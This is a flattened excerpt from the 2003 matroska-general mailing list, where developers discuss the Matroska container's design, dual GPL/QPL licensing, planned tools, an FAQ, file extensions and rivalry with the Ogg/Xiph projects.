It's just people scanning for MS IIS security problems. They scan the whole web in search for a "target" to hack. But you're safe with Apache (if you do regular updates). I have excellent contact with koepi for several months now, mostly over PM on IRC, and he is very positive about our project. Its a clear sign if he is posting such comments, people start to get being annoyed about all the discussions backwards and forwards, Ogg or matroska, is OGM a real Ogg or not, etc. pp. As a matter of fact, me advertising the format on webboards has brought us some attention and awareness, but no real contributors to be honest ( and that was my main goal on this ). Paul ( Pamel ) and Moritz joined the core team recently, but both will agree i guess, that it wasnt at all the fact to read about matroska in threads on Doom9, or any other webboard, that made them decide to contribute to it. With Tobias joining XipH exactly the opposite to what i expected seems to be happening, means people have more and more doubts if OGM will persist in its current way, so maybe i was seeing things much too negative for our project when the message arrived. I admit for some time i was a very demotivated, because i felt the future of our project was at least endangered, fearing about the acceptance for matroska from our potential users. About the thread : Emmett was questioning the existence of matroska publically, so we had to respond to this, what we did and we did very well i guess. MfA, being a real Ogg container fan it seems, was asking why we havent built matroska on top of Ogg, so we told him why this was no option for us. Please, lets stop the talking and discussion now. We have everything we need now to be able to build a 1st version of matroska creation tools, for both Windows ( thanks to Suiryc's VdubMod ) and Linux ( thanks to Moritz ), plus a quite well working Dshow parser skeleton ( thanks to Jan ). It should be possible to start alpha testing in the small, well known circle of alpha testers by end of february, on both webboards. Lets surprise all the people out there now, who are doubting we ever will make it !! And be very very quiet until then .... And be very very quiet until then .... Well, yes. But you must also reckon that we didn't reach this stage on matroska by just working alone in a corner. We listen and see what is around. And as I may have misunderstood the way OGG is working, I wanted to make sure. And frankly even if it's working it's a real mess for developpers. Now I know for sure matroska is better designed than OGG. And I hope other people are convinced too. Starting from Emmett and other ppl of Xiph. Because in the end I think they will have to realise it. And since they want to build soemthing big, it would be better if it's not build on swamps... Anyway, for sure we're currently not in position to say people to use matroska instead of OGG (unless they need UDP streaming). So yes, alpha tools in the main priority. But as we have always done we discuss at the same time and change the format when needed. It's still open to changes in case it's needed. For example, should we allow a stream for fonts ? It's not needed in a file on HD. But it might be when streaming/broadcasting. Maybe we just need a special stream to put attached data inside (the same data that can be attached in a file). So that anything that can be attached, can be streamed too. The software is truely great, instead of just applying "generic" noice reduction, you first build noise profile, by taking "noise samples" from the picture. Then you select smaller areas to fine tune the noise equalizer. It creates the profile according to these samples. I know you >ment this license mainly for the libs, but cant this confuse people ? Too bad you weren't with us on the Reunion Island as we already talked about it ;) Actually the code is dual licensed, GPL and QPL. - GPL because this way we are sure we are GPL compatible (can be integrated in other GPL softwares) - QPL because this one allows better control on fork of the work. Which is not possible with GPL, BSD, etc. It's also better suited for commercial products. What is dual licensing ? The person that receives the code "chose" the license to apply to the code. So if one modifies it is either covered by the GPL rules or QPL rules. If you chose GPL then the new code published is GPL, otherwise it's QPL (and has to be provided as a delta, ie patch). I think this way we get the best of both worlds : GPL compatible and closed business is still possible. http://matroska.org From christian.hj.wiesner at web.de Mon Jan 20 23:59:32 2003 From: christian.hj.wiesner at web.de (ChristianHJW) Date: Mon, 20 Jan 2003 23:59:32 +0100 Subject: [matroska-general] Re: [UCI-Devel] CVS updated (Doxygen documentation added..) Unfortunately, as UCI and MCF/matroska are closely related in people's minds and XipH people are shooting from all guns against matroska as being an 'unnecessary' thing ( Ogg is already here they say ) it happened recently that UCI all of a sudden came into the fireline also. There was some badmouthing about the UCI project as a result of that, fortunately mainly on some IRC channels without huge public attention. Some people there were calling the project dead, so its of very high value to be able to show UCI is alive !! Scope of this tool is 1. Repair damaged matroska files - seek for ECC elements in the file, restore protected content if possible - rebuild index etc. 2. Reorder Blocks according to time stamps, e.g. after the file was edited. This process can be described as 'hinting' also, as it may be a preparation step to be able to stream the file or to burn it onto disk. 3. Add additional EDC/ECC to a file to prepare it for mode 2 form 2 burning. User can define a max file size for that, typical is 795 MB ( max. mode2 form2 for a 80 mins CD ). The tool should - scan the file - indetify those areas that need the most protection - insert EDC/ECC elements ( details about ECC to be clarified with Frank Klemm ) until the max file size is reached - reorder/rewrite file to prepare for burning Important : compliancy with actual XCD backup creator must be assured in any case !! If you are uncertain, double check with de_xt before implementing. Supported OSes : WinME/2k/XP, Linux/*nix, MacOS, BeOS ( OBOS ) Preferred Language : Delphi or Java Anybody reading this list interested in accepting the job ;-) ?? And you'll have another (less) hard time linking Java to libmatroska... So I suggest C, C++, Objective C or maybe C# (java is still OK). Alos the tool you mention is great, but it should not take that much work (6-8 months!) to do once libmatroska is up and running. http://matroska.org From steve.lhomme at free.fr Wed Jan 22 09:53:29 2003 From: steve.lhomme at free.fr (Steve Lhomme) Date: Wed, 22 Jan 2003 09:53:29 +0100 (CET) Subject: [matroska-general] Binary launch Message-ID: <1043225609.3e2e5c094d185@imp.free.fr> Hi everyone, I was thinking this morning about how the launch of libmatroska and possibly some tools that works with it (hopefully the DirectShow filter). That means we'll have to be prepared to a lot of questions from people that have no clue of what's going on with matroska. In order to reduce the time we spend on forums or replying emails with 10 times the same answer to the same question, I suggest we start a FAQ page on matroska.org. Then we could redirect ppl to this page to check for their questions there first (and we can continue making real work). I think we can already create this page now and add questions we can think about, or maybe make a sticky page on CC that we could update when needed (mmm, only the original author could update it). Because the first people that will need information on the format will be developpers. Hopefully the ones already working on integrating matroska/libmatroska know a lot about it. But I suggest all the developpers subscribed here to send the questions they have on the format (technical or not). Spyder should collect them, organise them, and hopefully reply (otherwise I will). I'd like to contribute here, but I don't have any question on the format (hopefully). Spyder you can already try to make a recap of what has been said yesterday on IRC regarding the dual licensing of the code. As for sure, people will want to know their rights before using the code (and our policy regarding the code). http://matroska.org From Paul at msn.com Fri Jan 24 23:35:47 2003 From: Paul at msn.com (Pamel) Date: Fri, 24 Jan 2003 16:35:47 -0600 Subject: [matroska-general] Re: Binary launch References: <1043225609.3e2e5c094d185@imp.free.fr> Message-ID: "John Cannon" wrote > The document will begin with a brief description of the > format that should be easily understood by those who would be interested in > knowing what Matroska is. Yes, you start off with an intro that describes why Matroska is needed. Then explain how Matroska fills those needs. Next explain any benefits of Matroska over other formats without getting technical. Statements can have links to the technical portion of the document to explain a feature more in-depth. Then explain the basic structure as related to XML/EBML, and describe in detail each of the elements included in the specs page. > Let's make a HUGE first impression. It's a mostly complete EBML library with a few Matroska elements defined. Steve is testing the EBML functioning to make sure all is workling properly. He said that coding the Matroska parts should take very little time as they are based on this code. Once it is debugged, the Matroska Element classes should be easily coded and bugs should be minimal. That's why we're keeping the code not really public (only developpers can use it) as the format is still subject to changes (see yesterday's updates and I still didn't have a look to your LFE email). Right now I can't think of any changes on the EBML part, which is highly flexible and should not have any forward compatibility problems (new basic types should be added to handle other complicated forms of the format). On the other hand, matroska defines a lot of stuff in the standard. And not all of them are tested and can be tested soon. So the spec freezing will not happen very soon (or at list only for the working/tested parts). Once the first beta code is released to the general public (with tools using that code) all the introduced/used elements should be considered as frozen. http://matroska.org From steve.lhomme at free.fr Tue Jan 28 12:24:40 2003 From: steve.lhomme at free.fr (Steve Lhomme) Date: Tue, 28 Jan 2003 12:24:40 +0100 (CET) Subject: [matroska-general] KAR (MKR) file format Message-ID: <1043753080.3e3668783ea5e@imp.free.fr> As the first valid matroska file produced (see CVS code) is a file containing other files, it is very similar to a TAR file (hence the KAR name I use). The only missing part that is (used) in TAR is the path, the owner/group and the file attributes (read/write/execute, hidden, archive, and other meta data). If anybody has knowledges on TAR and these kinds of format, ie a non-compressed file containing other files, please tell us what is good to do in matroska. I would really like to have a full feature replacement for TAR with the flexibility of EBML :) Or maybe it should go in full-featured another project (kar ?) that we could build the matroska attachements on. One of the question I have is how to use access lists instead of the standard UNIX Owner/Group/World system. Access lists are supposed to be more general (with different groups of user), but maybe they are OS dependent. Another question is how to keep the meta data from the filesystem as used on HFS on Mac. Standard UNIX apps on OSX lose these valuable informations (and so your file doesn't work as it used to be on recovery). I wonder if there should be a "standard KAR" element for each kind of meta data (that would be translated to/from the OS) or just a raw saving of the meta data in a different way depending on the OS/filesystem. I tend to think the standard way is better, as you can change of OS/filesystem without any problem. http://matroska.org From Paul at msn.com Wed Jan 29 09:12:10 2003 From: Paul at msn.com (Pamel) Date: Wed, 29 Jan 2003 02:12:10 -0600 Subject: [matroska-general] Matroska File Extensions Message-ID: I went ahead and just posted the poll for Matroska file extensions over on Doom9. I also got no indication what was so specific about the things Steve chose to become a project of java foundry, but while i was there i made a few changes, but this were only additions to the existing categories ( i didnt change or remove any of Steves settings ). The only reason i could see for this is that Lasse, when setting the old mediacontainer project to 'inactive' , changed the project homepage from mediacontainer.sf.net to mcf.sf.net Maybe they just were quickly visiting the group ID i gave, noticed the homepage registered for it and assumed its the unix name 'mcf' ??? Set the status of the support request to 'completed' . I can do so as i was submitting it, and it disappeared from this list in the very same second, while MCF is still up and alive. 3. Steve, i support and appreciate this idea a lot !! >Is it connected to any other > network ? I guess not, but Betaboy should be able to clarify if there are any plans for doing so ? Dan ? And for multimedia, corecodec should be the one ! So let's ask other multimedia projects to move there (with the reason). But let's first check if corecodec is reliable enough. http://matroska.org From steve.lhomme at free.fr Fri Jan 31 10:58:34 2003 From: steve.lhomme at free.fr (Steve Lhomme) Date: Fri, 31 Jan 2003 10:58:34 +0100 (CET) Subject: [matroska-general] Are we doing well ? Communication was always a key element in our small team, and it helped a lot to finish the long and winding road of creating our roadbook for the project itself, and in fact i feel pretty safe now, believing we have been discussing many important aspects when designing matroska, before we actually started working on it. I cant help but get the feeling that this is not the case with our friends from Xiph working on Theora right now. Monty is doing it completely behind closed doors ( read the complaints from Theora fans on the theora MLs about getting no info about its current status at all here http://article.gmane.org/gmane.comp.multimedia.ogg.theora.devel/300 ), with only his ideas in mind it seems, and i would be very surprised if the 'product' he will finally present to the opensource world will meet with all requirements. Interesting to see Dan B. Miller, the former CTO of ON2 and now actively helping with Theora integration into Ogg, himself had no ideas or plans for a Theora DirectShow filter ( Xiph people still neglect the 'market' importance of Dshow filters, for whatever reason ), nor did he know that there were Vorbis DShow filters ( he calls them 'WMP plugins' ) made from Tobias, nor did he have any idea that Tobias is now a member of the Theora development group ???? Strange, istn it ... But, in the email here http://article.gmane.org/gmane.comp.multimedia.ogg.theora.devel/310 he is writing
At this point, if someone wanted to develop encoders or decoders that do NOT depend on Ogg as a container would probably be best served by working with the old VP3 codebase (available at www.theora.org/cvs).
LOL ! Good old VfW interface ... hehehe It will take Xiph people some time to understand the bussiness they are going into now, and i guess in the end they will be pretty happy one day that we made matroska, being a very powerful container for video capturing, editing and storage, and that we also try to actively contribute to UCI to have a free, opensource codec API to set the Xiph codecs on to. With the help of great developers like Cyrius we will hopefully succedd to make UCI be supported by many other important video encoding tools, like VdubMod, Mencoder, Transcode, Gstreamer, etc. Monty himself is obbviously still thinking in command lines with respect to Theora. Thats nice for audio encoding purposes, but certainly not the way to go if you want to reach a broad video encoding audience ;) ... We're definitely lacking some resource to need tip 3. But anyway on SF there is not right for CVS except : nothing, read (anonymous), read/write (nothing to control CVSROOT for example). http://matroska.org From christian at matroska.org Fri Jan 31 15:07:07 2003 From: christian at matroska.org (Christian HJ Wiesner) Date: Fri, 31 Jan 2003 15:07:07 +0100 Subject: [matroska-general] Extensions : add .mca .mcv .mcm to the poll ?
